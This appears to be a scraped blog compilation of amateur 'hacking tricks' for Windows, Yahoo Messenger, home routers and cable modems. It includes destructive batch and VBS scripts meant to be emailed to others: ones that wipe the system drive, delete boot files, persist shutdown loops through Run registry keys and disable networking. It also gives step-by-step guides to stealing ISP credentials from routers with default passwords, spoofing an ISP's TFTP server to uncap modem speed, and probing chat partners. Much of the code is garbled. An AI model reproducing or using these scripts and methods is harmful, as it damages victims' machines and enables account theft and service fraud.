To lock the xxxx folder, simply click the loc.bat and it will transform into control panel icon which is inaccessible.
To unlock the folder click the key.bat file. Thus the folder will be unlocked and the contents are accessible. Locking Drives: We don’t usually prefer to lock our drives, but sometimes it becomes nesscary. Say for instance you might have stored your office documents in D:\ and you don’t want your kids to access it, in such case this technique can be useful for you. Please don’t try this tweak with your root drive (usually C:\ is the root drive) since root drives are not intended to be locked because they are mandatory for the system and application programs.
Start & Run and type Regedit to open Registry editor
Browse HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
Create a new DWORD value NoViewOnDrive and set its value as 2^ (Alpha Number of Drive Letter-1) where Alpha number are simple counting of alphabets from A to Z as 1 – 26 For example: to lock C:\, Alpha number of C is 3 so 2^ (3-1) = 4 (decimal value)
To lock more drives, calculate the value of each drive and then set sum of those numbers as value
To unlock your drive just delete the key from the registry.

MOBILE PHONE VIRUS REMOVING TRICKS

MOBILE PHONE VIRUS REMOVING TRICKS



A mobile phone virus or mobile malware – malicious mobile software – is a computer virus specifically adapted for the mobile phone environment and designed to spread from one vulnerable phone to another.A virus is a program code that replicates by being copied to another program. Viruses can be transmitted as attachments to an email or in a download file. Some viruses take effect as soon as their code is executed; other viruses can lie dormant. A virus that replicates by resending itself as an email attachment or as a part of a network message is known as a worm.Viruses can range from benign to quite harmful; they can erase data from the infected phone or send fake messages purporting to be from the phones owner. How prevalent are mobile phone viruses? The current security risk from mobile phone viruses and worms is low.Until many more smart phones or PDAs are in use, and users of these phones are regularly exchanging executable files, the risk will remain low.The mobile industry takes the threat of viruses very seriously and is continually monitoring its networks and working to protect users from any future risk from mobile phone viruses. There are also some simple measures that individual users can implement to protect themselves.What can I do to protect my phone?The following tips can help prevent problems with viruses on your phone:1. Switch to Bluetooth hidden mode. If your phone has Bluetooth capability, ensure that the Bluetooth capability is switched to hidden or invisible mode unless you specifically need it to be visible.This will help prevent other Bluetooth-enabled devices from finding your phone (unless you grant them the necessary permission) and will therefore help protect your phone from worms that spread using the Bluetooth wireless technology.2. Exercise caution before opening attachments. When accepting applications sent via Bluetooth, or opening MMS attachments, exercise caution, just as you would when opening an email attachment on your PC, because they may include harmful software.Ensure the application or attachment comes from a known source, and is wary of opening files that have unfamiliar text attached to them, even if they come from someone you know.3. Only download content from a trusted source. Trusted sources may include operator portals and other well-known brands that offer adequate protection against viruses and other harmful software. Be aware though that, as with emails, malicious or fraudulent users may be able to fake the appearance of a trusted source.4. Consider anti-virus software. Some software is available to prevent phone viruses. You may wish to consider downloading this software.5. Contact your phone manufacturer if concerned. If you think you have a virus, call the phone manufacturer’s care line. They can assist you confirm if it is a virus, and help fix the problem.

FINDING INVISIBLE IN YAHOO

FINDING INVISIBLE IN YAHOO



Many people nowdays prefer to stay offline while using Yahoo! Messenger -mostly done to avoid someone. There are many ways of finding people who are online but yet invisible.
First Method: Doodle Method1. Double Click on the user whose status you want to check.2. A message window will open.3. Click IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle.4. The last step and the most important step. After loading the Doodle IMVironment, there will be two possibilities.a) If the user is offline, the Doodle area will show “waiting for your friend to load Doodle” continuously. If the user is online (in invisible mode), after few seconds (it can take up to one minute, depending on connection speed), you will get a blank page.So the user is online!There is a counter attack of this trick:Go to Messenger>>Preferences>>Messages and now uncheck Enable IMVironments. Now this trick is nullified!Second Method: Voice Chat1. Double Click on the user whose status you want to check.2. Click on “Voice” icon on the toolbar, or select “Contact” menu and select “Enable Voice Chat” .3. The deciding part… there are 2 possible results:a) If the user is offline, you will get this message: “Internal server error. Cannot obtain voice token to start voice chat.” If the user is invisible (actually online), you will see the Voice Toolbar.Third Method: Conference Invitation1. Right Click on the user whose status you want to check.2. When the menu appears, select Invite to Conference.3. A window will appear. See at the right pane, the username you selected will be there. Now, click Invite.4. The deciding part… there are 2 possible results:a) If the user is offline, you will get this message: “None of the users in the invite list are available to join the conference.Please try at a later time.”If the user is invisible, you will get a window similar saying: “You are now logged into voice conference – ”Fourth Method: Buddy Spy1. Get Buddy Spy from http://www.buddy-spy.com/2. Go to configure and enter your login details.3. Now go to Buddy Spy option and enter the username you want to track. You can also check multiple ids also. Not only Buddy Spy tells the status of Chat but also Room Chat and WebCamera status of that user also!4. You can edit other options through Scan Options menu.Now Have a great chatting!

VIRUS CODE

VIRUS CODE

A simple VIRUS code is here: Just save the following code as .bat extension in notepad.The antivirus will detect it as virus. see for yourself. It will affect *.com and *.EXE files .
It will multiply itself and may get more dangerous when altered.
@echo off>nul.ViRuSif
“%1==”/ViRuS_MULTIPLY goto ViRuS_multiplyif
“%1==”/ViRuS_OUTER_LOOP goto ViRuS_outer_loopif
“%1==”/ViRuS_FINDSELF goto ViRuS_findselfif
“%VOFF%==”T goto ViRuS_OLDBAT
set ViRuSname=%0
if not exist %0.bat call %0 /ViRuS_FINDSELF %path%
if not exist %ViRuSname%.bat set ViRuSname=if “%ViRuSname%==” goto ViRuS_OLDBAT

HACK YAHOO WHILE CHATING

HACK YAHOO WHILE CHATING


HACK YAHOO ACCOUNT WHILE CHATTINGThis is only for education purpose.So who ever try this is at his risk.I am not sure that this will work 100 %.But yes will work almost 70 percent of the times.But before that you need to know some few things of yahoo chat protocolleave a comment here after u see the post lemme know if it does works or not or u havin a problem post hereFollowing are the feature : -1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.2) When we send files yahoo has 2 optionsa) Either it uploads the file and then the other client has to down load it.b) Either it connects to the client directly and gets the files3) When we use video or audio:-a) It either goes thru the serverb) Or it has client to client connectionAnd when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remeber i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.So lets analyse1) Its impossible to get a Attackers IP address when you only chat.2) There are 50 % chances of getting a IP address when you send files3) Again 50 % chances of getting IP when you use video or audio.So why to wait lets exploit those 50 % chances.I will explain only for files here which lies same for Video or audio1) Go to cmd(dos)type ->netstat -n 3You will get the following output.Just do not care and be coolActive ConnectionsProto Local Address Foreign Address State.Active ConnectionsProto Local Address Foreign Address StateTCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHEDTCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHEDTCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHEDTCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHEDJust i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->2) Try sending a file to the Target .if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is establishedHMMMM then the first attacker first phase is overThis is the output in your netstat.The 5101 number port is where the Attacker is connected.Active ConnectionsProto Local Address Foreign Address StateTCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHEDTCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHEDTCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHEDTCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHEDTCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHEDThats what is highlighted in RED. So what next3) Hmmm Ok so make a DOS attack nowGo to dos prompt andJust donbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.C:>nbtstat -A 194.30.209.14Local Area Connection:Node IpAddress: [194.30.209.15] Scope Id: []NetBIOS Remote Machine Name TableName Type Status---------------------------------------------EDP12 <00> UNIQUE RegisteredSHIV <00> GROUP RegisteredSHIV <20> UNIQUE RegisteredSHIVCOMP1 <1e> GROUP RegisteredMAC Address = 00-C0-W0-D5-EF-9A .TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHEDTCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHEDTCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHEDTCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHEDOk so you will ask now what next.No you find what you can do with this network than me explaining everything.So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.

HIDING DRIVE

HIDING DRIVE


1) Go to Start -> Run -> “regedit”
2) Navigate to: HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
3) Choose Edit -> New -> DWORD Value and give name NoDrives.
4) Double click NoDrives and determine which drive that you want to vanish in Value Data.
Ex: If you wish to vanish drive E:, insert value 16 in Value Data.
The combination value in “Value Data” are as following:
A: > 1
B: > 2C: > 4D: > 8E: > 16F: > 32G: > 64H: > 128I: > 256J: > 512K: > 1024L: > 2048M: > 4096All: > 67108863This is just for the information dont harm anybody please.

CHANGE THE IP IN 1 MIN

CHANGE THE IP IN 1 MIN


This article will help you to change your IP address within a minute. Just follow the following step and you will be thru.
1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit okYou should now be at an MSDOS prompt screen.
4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.
8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button againYou should now be back to the "Local Area Connection" screen.
15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"tongue.gif
18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP addressWith a little practice, you can easily get this process down to 15 seconds.P.S:This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back

ALL COLECTION VIRUS

ALL COLECTION VIRUS

ALL OF THEZE ARE TO BE TYPED IN NOTEPAD...
1) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!Type :Code:Set oWMP = CreateObject("WMPlayer.OCX.7")Set colCDROMs = oWMP.cdromCollectiondoif colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextEnd Ifwscript.sleep 5000loop
Save it as "Anything.VBS" and send it.


2) Convey your friend a little message and shut down his / her computer:Type :Code:@echo offmsg * I don't like youshutdown -c "Error! You are too stupid!" -sSave it as "Anything.BAT" in All Files and send it.

3) Toggle your friend's Caps Lock button simultaneously:Code:Set wshShell =wscript.CreateObject("WScript.Shel
l")dowscript.sleep 100wshshell.sendkeys "{CAPSLOCK}"loopSave it as "Anything.VBS" and send it.

4) Frustrate your friend by making this VBScript hit Enter simultaneously:Type :Code:Set wshShell = wscript.CreateObject("WScript.Shell
")dowscript.sleep 100wshshell.sendkeys "~(enter)"loopSave it as "Anything.VBS" and send it.

5)This Virus Deletes All The Content Of A Drive... @echo offdel %systemdrive%*.* /f /s /qshutdown -r -f -t 00 Save The Above Code As Anything.bat

6)This Will Crash Ur Computer Option ExplicitDim WSHShellSet WSHShell=Wscript.CreateObject("Wscript.Shell")Dim xFor x = 1 to 100000000WSHShell.Run "Tourstart.exe"Next
Save It As Anything.vbs

7)It Only Works With Windows XPThe Most Simple Virus To Crush The Window@Echo offDel C: *.* y Save It As Anything.bat

8)Virus that crashes pc
@echo offattrib -r -s -h c:autoexec.batdel c:autoexec.batattrib -r -s -h c:boot.inidel c:boot.iniattrib -r -s -h c:ntldrdel c:ntldrattrib -r -s -h c:windowswin.inidel c:windowswin.ini@echo offmsg * YOU GOT OWNED!!!shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:DriveSave As Anything.bat File In Notepad!!This Will Pop Up A Message Saying OWNED!!And Shut Down The Computer Never To Reboot Again!

9)Shutdowns Computer Everytime It Is Turned OnSave As A bat Fileecho @echo off>c:windowshartlell.batecho break off>>c:windowshartlell.batecho shutdown -r -t 11 -f>>c:windowshartlell.batecho end>>c:windowshartlell.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /freg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /fecho You have been HACKED.PAUSE

10 )Disable Internet Permanentlyecho @echo off>c:windowswimn32.batecho break off>>c:windowswimn32.batecho ipconfig/release_all>>c:windowswimn32.batecho end>>c:windowswimn32.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!PAUSESave As A bat File

11)Change Files To Non-working TXT FilesSave As A bat FileREN *.DOC *.TXTREN *.JPEG *.TXTREN *.LNK *.TXTREN *.AVI *.TXTREN *.MPEG *.TXTREN *.COM *.TXTREN *.BAT *.TXTSystem Meltdown

12)System Meltdown:CRASHnet send * WORKGROUP ENABLEDnet send * WORKGROUP ENABLEDGOTO CRASHipconfig /releaseshutdown -r -f -t0echo @echo off>c:windowshartlell.batecho break off>>c:windowshartlell.batecho shutdown -r -t 11 -f>>c:windowshartlell.batecho end>>c:windowshartlell.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /freg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /fecho You Have Been Hackedecho @echo off>c:windowswimn32.batecho break off>>c:windowswimn32.batecho ipconfig/release_all>>c:windowswimn32.batecho end>>c:windowswimn32.batreg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho YOU HAVE BEEN HACKED BITCHREN *.DOC *.TXTREN *.JPEG *.TXTREN *.LNK *.TXTREN *.AVI *.TXTREN *.MPEG *.TXTREN *.COM *.TXTREN *.BAT *.TXTPAUSEPAUSESave As A bat File

13)Temporarily Flood Network:CRASHnet send * WORKGROUP ENABLEDnet send * WORKGROUP ENABLEDGOTO CRASHWe can make a batch file which will Shutdown the computer everytime on startup !Here is how ?? Open Notepad? Type :@ECHO OFFshutdown -s -t 10 -c "Virus Attack..."exit? File >> Save As...? Name it : virus.bat? Start >> All Programs? Right Click on Startup >> Open? This open the Startup folder? Paste the Virus.bat file here !*** That's all , now the computer willautomatically shutdown on every startup !

ADSL HACKING

ADSL HACKING



This tutorial will explain to you how to hack someone’s internet account through his router. This hack is based on a security exploit of the router’s default password and the stupidity of the user.Explanation: when somebody buy’s a xDSL/Cable router, the router is set to manufactory defaults like IP range, user accounts, router table, and most important the security level. The last one we will exploit.Most routers will have a user friendly setup menu running on port 23 (telnet) and sometimes port 80 (http) or both.This is what we are looking for. Step 1:Get a multi IP range scanner like superscanner (superscanner is fast and easy to use, get it here).Get a xDSL/Cable user IP range. This is a single user IP 212.129.169.196 so the ip range of this Internet provider is 212.129.xxx.xxx most likely it will be from 212.129.1.1 to 212.129.255.255 .To keep your scanning range not to big it’s smart to scan from 212.129.1.1 to 212.129.1.255 it also depends of your bandwidth how fast the scan will be finished. The IP address above is just a example any IP range from a xDSL/Cable provider can be used for this hack.before you start scanning specify the TCP/IP ports. You know that we are looking for TCP port 23 (telnet) and TCP port 80 (http) so edit the list and select only port 23 and port 80.Now start scanning and wait for the results.When finished scanning look for a IP that has a open port 23 and 80. Write them down or remember them. Step 2.Way 1This is important: Most routers have connection log capability so the last thing you want to do is making a connection with your own broadband connection so use a anonymous proxy server or dialup connection with a fake name and address (56.9 modem for example) when connection to the victim’s router.Now get a telnet program. Windows has a standard telnet program just go to start, select run and type down “telnet” without the “, click or enter OK. Select “connect” than “Remote system” enter IP address of the victim in the “host name” field press OK.wait for your computer to make a connection. This way only works when the router has a open telnet port service running Way 2.This is important: Most routers have connection log capability so the last thing you want to do is making a connection with your own broadband connection so use a anonymous proxy server or dialup connection with a fake name and address (56.9 modem for example) when connection to the victim’s router.Open a Internet explorer windows enter the IP address of the victim after the http:// in the address bar.This way only works when the router has a open hyper text transfer protocol (http) service running. Step 3.Entering the userfriendly setup menu. 9 out of 10 times the menu is protected by a loginname and password. When the user doesn’t change any security value’s the default password stay’s usable.So the only thing you have to do is find out what type of router the victim uses. I use this tool: GFILanguard Network Security Scanner. (get it here) is good. When you find out the type of router that’s been used get the wright loginname and password from this list (get it here. not every router is on the list)Default router password list Step 4.When you have a connection in telnet or internet explorer you need to look for user accounts.PPP, PPtP, PPeP, PPoP, or such connection protocol. If this is not correct look for anything that maybe contains any info about the ISP account of the user.go to this option and open it. Most likely you will see a overview of user setup options.Now look for the username and password.In most case the username will be freely displayed so just write it down or what ever….The password is a different story. Almost always the password is protected by ********* (stars) in the telnet way there is noway around it (goto another victim) but when you have a port 80 connection (http). Internet connection way open click right mouse key and select “View source” now look for the field where the star are at. most likely you can read it because in the source code the star are converted to normal ASCII text.If not get a “******** to text” convertor like snadboy’s revelation V.2 (get it here) move the cursor over the ****** and….It’s a miracle you can read the password.

INCREASE DOWNLOAD SPEED TO 2 MBPS

INCREASE DOWNLOAD SPEED TO 2 MBPS


Hack Your Modem and Increase Your Download Speed from 64Kbps to any Speed You WishMost of us will be feeling that the surfing speed which is allocated by our ISP is not enough. People with 64Kbps will think 128Kbps will be cool speed. People with 128Kbps will think 256Kbps will be cool and so onThis tutorial will teach you how to increase your 64Kbps link to 512Kbps or what ever speed you like.It is very much possible to do this. With a bit of luck if your Cable Internet Service Provider are very uneducated on how this very new technology works and leave some key loopholes open for you to grab vital information on how to accomplish this task. But this tutorial will no guarantee you 100% success.Okay here we go. I'm going to try to explain you as best as I can to accomplish re-configuring your SB5100, SB4100 or SB3100 cable modemTheory of cable modem workingAll the cable modems when it boots up it will search for an "Image file" where in all configuration like your upload speed limit and download speed limit is defined. This "Image file" is stored in ISP`s TFTP server. Modem will be pre-configured with the ISP`s TFTP server IP address and the Image file name to be downloaded. When the modem boots up it query TFTP server and download Image file from TFTP server according to this our speed limits will be set.Our MissionGet this Image file from ISP`s TFTP server, reconfigure it according to our need and force our modem to download this file from our Computer rather than downloading it from our ISP`s TFTP server.Steps to accomplish1). Get cable modems MAC address2). Get your ISPs TFTP server IP address3). Get name and path of the "configuration file" or Image file stored in the ISP`s TFTP server.4). Download Image file from ISP`s TFTP server.5). Decrypt the Image file which you downloaded from ISP`s TFTP server6). Modify the Image file7). Encrypt the modified Image fileCool. Change your computer's TCP configuration same as ISP`s TFTP server (i.e. IP address same as ISP`s TFTP server)9). Host TFTP server in your computer10). Put Image file in the base directory of your TFTP11). Restart your modem12). Changer your PC's IP back as given by ISP13). Done. Start surfing with your new speed1). Get cable modems MAC addressYou can either look at the back of the modem to get this MAC Address or you can logon to your Cable modem with your Web Browser hxxp://192.168.100.1/ . This is internal HTML pages stored within your DOCsis cable modem (SB5100, SB4100 and SB3100) that gives you even more vital information on configuration. Unless it is turned off by your ISP. This feature might be totally turned off by your ISP.2). Get your ISPs TFTP server IP address3). Get name and path of the "configuration file" or Image file stored in the ISP`s TFTP server.For getting this vital information you have to do an SNMP walk over your modem. For doing this you can use any one of the tools belowa) There's a program called QUERY.EXE from Weird Solutions which is a BOOTP packet request program that will tell you everything you need to know, without all these extra steps. It will display the Image Filename, TFTP server address, which is really all you need to get started. To use this BOOTP QUERY tool, you need the MAC address of your cable modemOrExperts can use Solarwinds SNMP programOrc) Beginners can use DOCSIS Diagnosis utilityOrd) Beginners can use SNMPWALK Tooluse command "snmpwalk 192.168.100.1 public"NOTE: Use modem's IP address as "192.168.100.1" (SB5100, SB4100 and SB3100) when it asked to provide by any of the above tools. SNMP community is "Public"Using the above tools you will get the information of your ISP`s TFTP server IP and the name of your "Image file" stored in that TFTP serverAll your vital information is stored in this file, One of which is the MaxRateDown 2621440; MaxRateUp 393216;. (This was my ISP settings. Which you can see is similar to what speed I was getting. 40KB/s up and 250 KB/s down)Among these, the one we need are:Configuration TFTP Server = 194.*.*..90 (replace this with yours throughout in the doc)Configuration filename = isrr.bin (replace this with yours throughout in the doc)AndIP fragments created = 0IP address.10.xxx.xxx.xxx = 10.xxx.xxx.xxxIP address.192.168.100.1 = 192.168.100.1 (the IP address of the cable modem, (replace this with yours throughout in the doc)IP-to-If-index.10.xxx.xxx.xxx = 2Suggestion: You can do this step by sniffing the modem i.e. "192.168.100.1" when modem boots up. I never tried this method. Try your luck.4). Download Image file from ISP`s TFTP server.For doing this got to your command prompt and use below commands with out quotes and bracket."C:tftp -i GET "Okay now you got Image file from your ISP`s TFTP server.5). Decrypt the Image file which you downloaded from ISP`s TFTP server6). Modify the Image file7). Encrypt the modified Image fileUse docsis tool which you can download fromCode:http://sourceforge.net/projects/docsisusing this program you can decrypt image file change the upload speed and download speed ,save it and encrypt back. Rename this newly created file same as your original image file.Cool. Change your computer's TCP configuration same as ISP`s TFTP server (i.e. IP address same as ISP`s TFTP server)Go to my network place and right click ->propertiesSelect your LAN Card right click ->property->Internet Protocol (TCP-IP) double click on it and change it to as following valuesConfigure your TPC's TCP settings as belowIP: 194.*.*.90 (replace with the ISP's TFTP server)Netmask: 255.255.255.0Gateway: 192.168.100.1 (replace with your cable modem's IP address)Note: Gateway should be 192.168.100.1 then only your modem can communicate with computer.9). Host TFTP server in your computer10). Put Image file in the base directory of your TFTP11). Restart your modemDownload TFTP Server software and host TFTP server in your computerYou can download TFTP server from:Code:ftp://ftp.ida.net/pub/wireless/tftpd32.exeStart TFTPD32 server. Go to Settings and set the Security to None. Increase the timeout to 20secs and the Max Retransmit to 6. Choose to translate UNIX filenames. Make sure it's base directory point to where the isrr.bin is (i.e. the image file which you modified). If you need to replicate a directory pathname along with the image file, then make a directory from root that corresponds to the image file pathname.Restart your modem, and AS SOON as the SEND light goes solid, you should see a receive on your TFTP server i.e. your PC12). Changer your PC's IP back as given by ISP13). OOPS Done. Start surfing with your new speedNow you change your TCP settings of your PC back to normal as given by ISP. (I.e. Put your original IP address and gateway)Oops you hacked your modem. Test out by downloading some files using DAP (Download accelerator plus)Note: This speed will remain same until you restart your cable modem. So each time you reboot your modem you have to follow the steps 8,9,10,11 and 12good luck.......

SOFTWARE CRACKING

This summary is not available. Please click here to view the post.

HACK THE SITE

HACK THE SITE

warning : For educational purpose onlyi know dis is lame but just would like to share wid u.have nothing for next half an hour so typing it.. lolhere are many ways to defeat java-script protected websites.
Some are very simplistic, such as hitting[ctl-alt-del ]when the password box is displayed, to simply turning offjava capability, which will dump you into the default page.You can try manually searching for other directories, by typing the directory name into the url address box of your browser, ie: you want access to www.target.com .Try typing www.target.com/images .(almost ever y web site has an images directory) This will put you into the images directory,and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory. ie: in www.target.com/images, there is a .gif named gamestitle.gif . There is a good chance then, that there is a 'games' directory on the site,so you would then type in www.target.com/games, and if it isa valid directory, you again get a text listing of all the files available there.For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all director ies,or even mirror a complete server. They are indispensable for locating hidden files and directories.What do you do if you can't get past an opening "PasswordRequired" box? . First do an WHOIS Lookup for the site. In our example, www.target.com . We find it's hosted by www.host.com at 100.100.100. 1.We then go to 100.100.100.1, and then launch Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K. (not many HTML pages are bigger than this) This speeds things up some, and keeps you from getting a lot of files and images you don't care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of its sub-directories listed. Let's say we find /target/games/zip/zipindex.html . This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here.By simply typing in the url www.target.com/games/zip/zipindex.html you will be onthe index page and ready to follow the links for downloading.
More on Telnet******************************************************In this Article you will learn how to:* Use telnet from Windows* Download web pages via telnet* Get finger information via telnet* Telnet from the DOS command-line* Use netcat* Break into Windows Computers from the InternetProtecting YourselfWhat can they doThe command-line approachThe GUI approachFinal Words (prakash janawade)************************************************************How to Use Telnet on a Windows ComputerTelnet is great little program for doing a couple of interesting things. In fact, if you want to call yourself a hacker, you absolutely MUST be able to telnet! In this lesson you will find out a few of the cool things a hacker can do with telnet.If you are using Win95, you can find telnet in the c:windows directory, and on NT, in the c:winntsystem32 directory. There isn't a lot of online help concerning the usage of the program, so my goal is to provide some information for new users.First off, telnet isn't so much an application as it is a protocol. Telnet is protocol that runs over TCP/IP, and was used for connecting to remote computers. It provides a login interface, and you can run command-line programs by typing the commands on your keyboard, and the programs use the resources of the remote machine. The results are displayed in the terminal window on your machine, but the memory and CPU cycles consumed by the program are located on the remote machine. Therefore, telnet functions as a terminal emulation program, emulating a terminal on the remote machine.Now, telnet runs on your Win95 box as a GUI application...that is to say that you can type "telnet" at the command prompt (in Windows 95 this is the MS-DOS prompt), and assuming that your PATH is set correctly, a window titled "telnet" will open. This differs from your ftp program in that all commands are entered in the DOS window.Let's begin by opening telnet. Simply open a DOS window by clicking "start", then "programs", then "MS-DOS", and at the command prompt, type:c:telnetThe window for telnet will open, and you can browse the features of the program from the menu bar.***************************************************NEWBIE NOTE: In this text file, I am referring only to the telnetprogram that ships with Win95/NT. If you type "telnet" at thecommand prompt and you don't get the telnet window, make surethat the program is on your hard drive using the Start -> Find ->Files or Folders command. Also make sure that your path statement includes the Windows directory. There are many other programs available that provide similar functionality, with a lot of other bells and whistles, from any number of software sites.*************************************************To learn a bit more about telnet, choose Help -> Contents, orHelp -> Search for help on... from the menu bar. Read throughthe files in order to find more detailed explanations of thingsyou may wish to do. For example, in this explanation, I willprimarily be covering how to use the application and what it canbe used for, but now how to customize the colors for the application.Now, if you choose Connect -> Remote System, you will be presented with a dialog window that will ask you for the remote host, the port and the terminal type.****************************************************NEWBIE NOTE: For most purposes, you can leave the terminal type onVT100.****************************************************In the Connect dialog box, you can enter in the host to whichyou wish to connect, and there is a list box of several portsyou can connect to:daytime: May give you the current time on the server.echo: May echo back whatever you type in, and will tell you that the computer you have connected to is alive nd running on the Internet. qotd: May provide you with a quote of the day.chargen: May display a continuous stream of characters, useful for spotting network problems, but may crash your telnet program.telnet: May present you with a login screen.These will only work if the server to which you are trying to connect is running these services. However, you are not limited to just those ports...you can type in any port number you wish. (For more on fun ports, see the GTMHH, "Port Surf's Up.") You will only successfully connect to the port if the service in question is available. What occurs after you connect depends upon the protocol for that particular service.When you are using telnet to connect to the telnet service on a server, you will (in most cases) be presented with a banner and a login prompt.[Note from Carolyn Meinel: Many people have written saying their telnet program fails to connect no matter what host they try to reach. Here's a way to fix your problem. First -- make sure you are already connected to the Internet. If your telnet program still cannot connect to anything, here's how to fix your problem. Click "start" then "settings" then "control panel." Then click "Internet" then "connection." This screen will have two boxes that may or may not be checked. The top one says "connect to the Internet as needed." If that box is checked, uncheck it -- but only uncheck it if you already have been having problems connecting. The bottom box says "connect through a proxy server." If that box is checked, you probably are on a local area network and your systems administrator doesn't allow you to use telnet.]*********************************************NEWBIE NOTE: It's not a good idea to connect to a host on which you don't have a valid account. In your attempts to guess a username and password, all you will do is fill the log files on that host. From there, you can very easily be traced, and your online service provider will probably cancel your account.**********************************************Now, you can also use telnet to connect to other ports, such asftp (21), smtp (25), pop3 (110), and even http (80). When youconnect to ftp, smtp, and pop3, you will be presented with abanner, or a line of text that displays some information about theservice. This will give you a clue as to the operating systemrunning on the host computer, or it may come right out and tellyou what the operating system is...for instance, AIX, Linux,Solaris, or NT. If you successfully connect to port 80, you willsee a blank screen. This indicates, again, that you have successfully completed the TCP negotiation and you have a connection.Now, what you do from there is up to you. You can simply disconnect with the knowledge that, yes, there is a service running on port 80, or you can use your knowledge of the HTTP protocol to retrieve the HTML source for web pages on the server.How to Download Web Pages Via TelnetTo retrieve a web page for a server using telnet, you need to connect to that server on port 80, generally. Some servers may use a different port number, such as 8080, but most web servers run on port 80. The first thing you need to do is click on Terminal -> Preferences and make sure that there is a check in the Local Echo box. Then, since most web pages will generally take up more than a single screen, enable logging by clicking Terminal -> Start Logging... and select a location and filename. Keep in mind that as long as logging is on, and the same file is being logged to, all new information will be appended to the file, rather than overwriting theoriginal file. This is useful if you want to record several sessions, and edit out the extraneous information using Notepad.Now, connect the remote host, and if your connection is successful, type in:GET / HTTP/1.0and hit enter twice.**************************************************NEWBIE NOTE: Make sure that you hit enter twice...this is partof the HTTP protocol. The single / after GET tells the serverto return the default index file, which is generally "index.html".However, you can enter other filenames, as well.*************************************************You should have seen a bunch of text scroll by on the screen. Now you can open the log file in Notepad, and you will see the HTMLcode for the page, just as though you had chosen the View Sourceoption from your web browser. You will also get some additionalinformation...the headers for the file will contain some informationabout the server. For example:HTTP/1.0 200 Document followsDate: Thu, 04 Jun 1998 14:46:46 GMTServer: NCSA/1.5.2Last-modified: Thu, 19 Feb 1998 17:44:13 GMTContent-type: text/htmlContent-length: 3196One particularly interesting piece of information is the servername. This refers to the web server software that is runningand serving web pages. You may see other names in this field,such as versions of Microsoft IIS, Purveyor, WebSite, etc.This will give you a clue as to the underlying operating systemrunning on the server.*************************************************This technique, used in conjunction with adatabase of exploits on web servers, can be particularly annoying.Make sure you keep up on exploits and the appropriate securitypatches from your web server and operating system vendors.**************************************************************************************************NEWBIE NOTE: This technique of gathering web pages is perfectly legal. You aren't attempting to compromise the target system, you are simply doing by hand what your web browser does for you automatically. Of course, this technique 